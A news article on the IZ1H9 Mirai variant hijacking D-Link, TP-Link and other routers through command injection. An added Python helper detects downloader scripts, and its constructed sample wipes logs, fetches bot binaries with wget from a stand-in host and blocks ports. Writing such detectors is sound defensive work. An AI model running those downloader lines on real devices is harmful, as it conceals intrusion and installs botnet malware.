Attackers find new ways to zombify your router: D-Link, TP-Link devices affected

A large-scale attack campaign is targeting routers and turning thousands of them into bots for DDoS attacks, Fortinet researchers have found.

Thirteen payloads were included in the variant of Mirai, a fairly old type of malware that’s used to target networked Linux devices and turn them into remotely controlled bots. Each new payload is specifically adapted to target D-Link devices, Netis wireless routers, Sunhillo SureLine software, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and Totolink routers.

Dubbed IZ1H9, the Mirai variant turns routers and other IoT devices into remote-controlled bots for large-scale network attacks.

Attackers incorporate the zombie routers into botnets, enabling them to launch further attacks like DDoS and brute-force attacks.

Telemetry shows that many thousands of routers, such as TP-Link Archer AX21s, were affected by unauthenticated command injections.

Peak exploitation occurred on September 6th, with trigger counts recorded by Fortinet IPS signatures ranging from the thousands to even tens of thousands.

[Image: Affected devices. Image by Fortinet.]

The impact of the IZ1H9 campaign is amplified by how quickly it adds exploits for newly disclosed vulnerabilities.

“This highlights the campaign's capacity to infect vulnerable devices and dramatically expand its botnet through the swift utilization of recently released exploit code, which encompasses numerous CVEs (Common Vulnerabilities and Exposures),” researchers write.

D-Link devices are targeted the most, with four new critical-severity vulnerabilities that allow remote attackers to deliver command injection via a crafted request.

After the payload is injected and executed, it starts by deleting logs to conceal its actions. It then downloads and executes bot clients built for several Linux CPU architectures. In the final step, the shell script downloader blocks network connections on multiple ports.
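A defender-side triage helper for the infection chain just described, written as an added example that is not from the Fortinet report or this article: it scans a captured shell-script downloader for the three behaviours named above (log wiping, downloads of bot clients named for several CPU architectures, and firewall rules that block ports) and returns a verdict with a simple score. The sample scripts, the architecture list, the regular expressions, the `.invalid` hostnames and the scoring weights are all constructed for this example.

```python
"""Heuristic triage of a captured shell-script downloader.

Looks for the three behaviours described in the article: log deletion,
multi-architecture bot downloads, and iptables rules that block ports.
All patterns, weights and samples below are constructed for this example.
"""
import re
from dataclasses import dataclass

# Architecture tokens commonly seen in payload filenames (illustrative list).
ARCH_NAMES = ("mips", "mipsel", "arm", "arm5", "arm6", "arm7", "x86",
              "i586", "i686", "x86_64", "sh4", "m68k", "ppc", "spc", "arc")

# An rm command whose arguments reach into /var/log (log wiping).
LOG_WIPE_RE = re.compile(r"\brm\b[^\n;|&]*/var/log")
# A single download command, cut at the next shell separator.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^\n;|&]*")
# iptables rule that drops or rejects traffic to a destination port.
FIREWALL_RE = re.compile(
    r"\biptables\b[^\n;|&]*--dport\s+(\d+)[^\n;|&]*-j\s+(?:DROP|REJECT)")


@dataclass
class Verdict:
    log_wipe: bool
    architectures: list[str]   # arch tokens found in download commands
    blocked_ports: list[int]   # destination ports dropped by iptables
    score: int                 # 0..7 under the constructed weights


def triage_script(text: str) -> Verdict:
    """Score a shell script for downloader-like behaviour."""
    log_wipe = bool(LOG_WIPE_RE.search(text))

    archs: list[str] = []
    for match in DOWNLOAD_RE.finditer(text):
        cmd = match.group(0).lower()
        for arch in ARCH_NAMES:
            # Match the token as a filename component, e.g. "bot.mips" or
            # "-O bot.arm7"; the word boundary keeps "arm" from matching "arm7".
            if re.search(r"[./_-]" + re.escape(arch) + r"\b", cmd) and arch not in archs:
                archs.append(arch)

    ports = sorted({int(m.group(1)) for m in FIREWALL_RE.finditer(text)})

    # Constructed weights: several architectures in one script is the strongest
    # signal, since legitimate update scripts fetch one build for one device.
    score = (2 if log_wipe else 0) + (3 if len(archs) >= 3 else 0) + (2 if ports else 0)
    return Verdict(log_wipe, archs, ports, score)


# Constructed sample resembling the behaviour described in the article.
SAMPLE_SCRIPT = r"""#!/bin/sh
rm -rf /var/log/* 2>/dev/null
cd /tmp
wget http://dropper.invalid/bins/bot.mips -O bot.mips
wget http://dropper.invalid/bins/bot.arm7 -O bot.arm7
wget http://dropper.invalid/bins/bot.x86_64 -O bot.x86_64
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
"""

# Constructed benign firmware-update script, to show the heuristic stays quiet.
BENIGN_SCRIPT = r"""#!/bin/sh
wget https://updates.example.invalid/firmware.bin -O /tmp/firmware.bin
sha256sum -c /tmp/firmware.bin.sha256
"""

if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, triage_script(script))
```

The score is only a triage hint: a script that fetches a single binary and drops one port may be a legitimate vendor tool, so the verdict fields are returned separately so an analyst can see which behaviours fired.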

“IoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the most common and concerning threats to both IoT devices and Linux servers. The exposure of vulnerable devices can result in severe security risks. Despite the availability of patches for these vulnerabilities, the number of exploit triggers remains alarmingly high, often numbering in the thousands,” Fortinet warns.

To counter this threat, Fortinet recommends promptly applying patches and changing default login credentials.
